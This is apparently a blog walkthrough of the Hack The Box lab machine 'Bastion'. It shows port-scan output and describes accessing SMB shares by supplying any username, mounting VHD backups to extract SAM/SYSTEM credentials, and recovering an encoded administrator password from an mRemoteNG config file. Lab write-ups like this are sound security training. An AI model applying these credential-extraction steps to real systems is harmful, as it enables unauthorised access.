Home Hack The Box Writeup - Bastion
Post
Cancel

Hack The Box Writeup - Bastion

Bastion is an easy Windows box. By exploiting weak user authentication for SMB, we were able to enumerate the SMB shares. Here, we discovered an interesting share that contained vhd backup files. Mounting those vhd files gave us access to the SYSTEM and SAM files, which were then used to dump the user password. Once having access to the system, we enumerated the system and found a directory mRemoteNG. This directory contained a config file, in which the administrator’s encoded password was stored. Decoding this using the mRemoteNG encoding/decoding mechanism allowed us to get hold of the administrator password.

Enumeration

As always, we start by scanning the target machine’s open ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
rustscan --ulimit 5000 bastion.htb -- sV -sC -oN nmap_scan

PORT      STATE SERVICE      REASON  VERSION
22/tcp    open  ssh          syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

The nmap output shows that there are many open ports. Probably most interesting for us are the open ssh, rpc and smb ports.

Enumeration of SMB shares (port 139, 445)

First, when we try to enumerate the SMB shares using smbmap we get an authentication error. However, one of the most frequent misconfigurations of SMB is the authentication. If we simply provide any arbitrary username, we are suddenly able to access the shares. This is because the server only throws the authentication error if no username is specified.

Looking at the shares, we see one share called Backups which is readable for us. Let’s investigate that further.

smbmap output using an arbitrary username: discovery of a share called “Backups”.

After mounting the share (optionally: you can also use smbclient to access the share), we can look at the files/directories of the share.

Mounting the remote share on our attacker machine

First, we look at the most obvious and eye-catching file, namely the note.txt:

1
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Hmmm, backups…. Maybe we should look through the WindowsImageBackup directory. After browsing through these directories for a while, we find an interesting directory that contains two vhd files.

“A VHD file contains a virtual hard disk image used by Microsoft Windows Virtual PC, a Windows virtualization program. It stores the contents of a hard disk of a virtual machine (VM), which may include disk partitions, a file system, files, and folders. https://fileinfo.com/extension/vhd”

1
sudo apt-get install libguestfs-tools

Initial Foothold - Enumerating the VHD files

Privilege Escalation

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. Additionally, It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, in a password protected and encrypted connections file. The password can be found at %appdata%/mRemoteNG in a file named confCons.xml. This password can sometimes be the administrator password https://vk9-sec.com/exploiting-mremoteng/

What seems to be a base64 encoded password, turns out not to be….. Base64 decoding the encoded password returns in pure garbage.

1
2
3
echo "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" | base64 -d

VaQt.ޙY`5Z(#ޠ-

https://github.com/haseebT/mRemoteNG-Decrypt/blob/master/mremoteng_decrypt.py

This post is licensed under CC BY 4.0 by the author.